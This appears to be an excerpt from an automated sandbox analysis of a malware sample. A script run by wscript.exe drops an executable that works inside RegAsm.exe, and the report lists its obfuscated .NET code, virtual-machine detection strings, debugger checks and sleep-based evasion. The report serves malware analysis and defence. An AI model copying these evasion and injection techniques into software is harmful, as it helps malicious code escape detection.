Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Source: temp_executable.exe.0.dr Static PE information: 0xE7F4B046 [Sun Apr 26 08:26:46 2093 UTC]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004030E0 push eax; ret 10_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0041488D pushfd ; iretd 10_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00401966 push esi; iretd 10_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00402179 push ss; retf 10_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0041F1A0 push ss; ret 10_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040D4C7 push edx; ret 10_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040D4CD push edx; ret 10_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00418DD0 push ebp; ret 10_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0040D589 push edx; ret 10_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004116BB push edi; retf 10_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0042373B push es; ret 10_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00413FC3 push edi; ret 10_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_004237B1 push es; ret 10_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF09AD push ecx; mov dword ptr [esp], ecx 10_2_02EF09B6
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs High entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 13C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 2B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: 4B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D1C0 rdtsc 10_2_02F6D1C0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 0.7 %
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7228 Thread sleep count: 158 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7228 Thread sleep count: 317 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7204 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 7172 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7284 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: wscript.exe, 00000000.00000003.1319553031.000002387C9BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: wscript.exe, 00000000.00000003.1319553031.000002387C9BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
Source: temp_executable.exe, 00000008.00000002.1314448331.0000000001002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00417663 LdrLoadDll, 10_2_00417663
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF2F8 mov eax, dword ptr fs:[00000030h] 10_2_02FAF2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE92FF mov eax, dword ptr fs:[00000030h] 10_2_02EE92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002E1 mov eax, dword ptr fs:[00000030h] 10_2_02F002E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA12ED mov eax, dword ptr fs:[00000030h] 10_2_02FA12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC52E2 mov eax, dword ptr fs:[00000030h] 10_2_02FC52E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1F2D0 mov eax, dword ptr fs:[00000030h] 10_2_02F1F2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF92C5 mov eax, dword ptr fs:[00000030h] 10_2_02EF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA2C3 mov eax, dword ptr fs:[00000030h] 10_2_02EFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B2C0 mov eax, dword ptr fs:[00000030h] 10_2_02F1B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB2D3 mov eax, dword ptr fs:[00000030h] 10_2_02EEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F792BC mov eax, dword ptr fs:[00000030h] 10_2_02F792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F792BC mov ecx, dword ptr fs:[00000030h] 10_2_02F792BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F002A0 mov eax, dword ptr fs:[00000030h] 10_2_02F002A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F052A0 mov eax, dword ptr fs:[00000030h] 10_2_02F052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F872A0 mov eax, dword ptr fs:[00000030h] 10_2_02F872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F872A0 mov eax, dword ptr fs:[00000030h] 10_2_02F872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov ecx, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F862A0 mov eax, dword ptr fs:[00000030h] 10_2_02F862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB92A6 mov eax, dword ptr fs:[00000030h] 10_2_02FB92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2329E mov eax, dword ptr fs:[00000030h] 10_2_02F2329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2329E mov eax, dword ptr fs:[00000030h] 10_2_02F2329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h] 10_2_02F70283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h] 10_2_02F70283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F70283 mov eax, dword ptr fs:[00000030h] 10_2_02F70283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2E284 mov eax, dword ptr fs:[00000030h] 10_2_02F2E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2E284 mov eax, dword ptr fs:[00000030h] 10_2_02F2E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5283 mov eax, dword ptr fs:[00000030h] 10_2_02FC5283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F31270 mov eax, dword ptr fs:[00000030h] 10_2_02F31270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F31270 mov eax, dword ptr fs:[00000030h] 10_2_02F31270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE826B mov eax, dword ptr fs:[00000030h] 10_2_02EE826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F19274 mov eax, dword ptr fs:[00000030h] 10_2_02F19274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FA0274 mov eax, dword ptr fs:[00000030h] 10_2_02FA0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h] 10_2_02EF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h] 10_2_02EF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4260 mov eax, dword ptr fs:[00000030h] 10_2_02EF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBD26B mov eax, dword ptr fs:[00000030h] 10_2_02FBD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBD26B mov eax, dword ptr fs:[00000030h] 10_2_02FBD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7D250 mov ecx, dword ptr fs:[00000030h] 10_2_02F7D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAB256 mov eax, dword ptr fs:[00000030h] 10_2_02FAB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAB256 mov eax, dword ptr fs:[00000030h] 10_2_02FAB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9240 mov eax, dword ptr fs:[00000030h] 10_2_02EE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9240 mov eax, dword ptr fs:[00000030h] 10_2_02EE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F78243 mov eax, dword ptr fs:[00000030h] 10_2_02F78243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F78243 mov ecx, dword ptr fs:[00000030h] 10_2_02F78243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF6259 mov eax, dword ptr fs:[00000030h] 10_2_02EF6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA250 mov eax, dword ptr fs:[00000030h] 10_2_02EEA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2724D mov eax, dword ptr fs:[00000030h] 10_2_02F2724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE823B mov eax, dword ptr fs:[00000030h] 10_2_02EE823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5227 mov eax, dword ptr fs:[00000030h] 10_2_02FC5227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F27208 mov eax, dword ptr fs:[00000030h] 10_2_02F27208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F27208 mov eax, dword ptr fs:[00000030h] 10_2_02F27208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC53FC mov eax, dword ptr fs:[00000030h] 10_2_02FC53FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h] 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h] 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E3F0 mov eax, dword ptr fs:[00000030h] 10_2_02F0E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F263FF mov eax, dword ptr fs:[00000030h] 10_2_02F263FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F003E9 mov eax, dword ptr fs:[00000030h] 10_2_02F003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF3E6 mov eax, dword ptr fs:[00000030h] 10_2_02FAF3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAB3D0 mov ecx, dword ptr fs:[00000030h] 10_2_02FAB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFA3C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF83C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAC3CD mov eax, dword ptr fs:[00000030h] 10_2_02FAC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F763C0 mov eax, dword ptr fs:[00000030h] 10_2_02F763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F233A0 mov eax, dword ptr fs:[00000030h] 10_2_02F233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F233A0 mov eax, dword ptr fs:[00000030h] 10_2_02F233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F133A5 mov eax, dword ptr fs:[00000030h] 10_2_02F133A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC539D mov eax, dword ptr fs:[00000030h] 10_2_02FC539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h] 10_2_02EEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h] 10_2_02EEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEE388 mov eax, dword ptr fs:[00000030h] 10_2_02EEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F4739A mov eax, dword ptr fs:[00000030h] 10_2_02F4739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F4739A mov eax, dword ptr fs:[00000030h] 10_2_02F4739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h] 10_2_02EE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h] 10_2_02EE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE8397 mov eax, dword ptr fs:[00000030h] 10_2_02EE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1438F mov eax, dword ptr fs:[00000030h] 10_2_02F1438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1438F mov eax, dword ptr fs:[00000030h] 10_2_02F1438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9437C mov eax, dword ptr fs:[00000030h] 10_2_02F9437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF367 mov eax, dword ptr fs:[00000030h] 10_2_02FAF367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h] 10_2_02EF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h] 10_2_02EF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7370 mov eax, dword ptr fs:[00000030h] 10_2_02EF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED34C mov eax, dword ptr fs:[00000030h] 10_2_02EED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED34C mov eax, dword ptr fs:[00000030h] 10_2_02EED34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FBA352 mov eax, dword ptr fs:[00000030h] 10_2_02FBA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
